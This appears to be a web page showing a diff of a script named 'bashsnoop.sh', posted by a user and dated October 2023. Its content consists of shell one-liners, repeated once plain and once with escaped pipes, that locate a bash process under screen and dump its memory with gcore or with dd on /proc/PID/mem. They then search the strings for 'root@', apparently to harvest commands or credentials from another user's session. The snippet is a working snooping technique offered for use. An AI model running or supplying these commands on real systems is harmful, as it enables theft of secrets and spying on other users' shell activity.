adampielak · October 4, 2023 21:23
diff --git a/bashsnoop.sh b/bashsnoop.sh
 bpid=$(ps -o pid,comm xwwwf | grep -A1 screen| tail -1 | awk '{print $1}'); \
  gcore $bpid; strings core.$bpid | grep '@' | grep root

 # no gdb? no problem! dd to the rescue
 bpid=$(ps -o pid,comm xwwwf | grep -A1 screen| tail -1 | awk '{print $1}'); \
  offset=$(grep heap /proc/$bpid/maps|cut -d '-' -f 1); \
   end=$(grep heap /proc/$bpid/maps|cut -d '-' -f 2|awk '{print $1}'); \
   dd if=/proc/$bpid/mem iflag=skip_bytes,count_bytes bs=$(getconf PAGESIZE) skip=$((0x$offset)) count=$((0x$end - 0x$offset)) status=none \
   | strings | grep root@
	bpid=$(ps -o pid,comm xwwwf \| grep -A1 screen\| tail -1 \| awk '{print $1}'); \
	gcore $bpid; strings core.$bpid \| grep '@' \| grep root

	# no gdb? no problem! dd to the rescue
	bpid=$(ps -o pid,comm xwwwf \| grep -A1 screen\| tail -1 \| awk '{print $1}'); \
	offset=$(grep heap /proc/$bpid/maps\|cut -d '-' -f 1); \
	end=$(grep heap /proc/$bpid/maps\|cut -d '-' -f 2\|awk '{print $1}'); \
	dd if=/proc/$bpid/mem iflag=skip_bytes,count_bytes bs=$(getconf PAGESIZE) skip=$((0x$offset)) count=$((0x$end - 0x$offset)) status=none \
	\| strings \| grep root@
No results found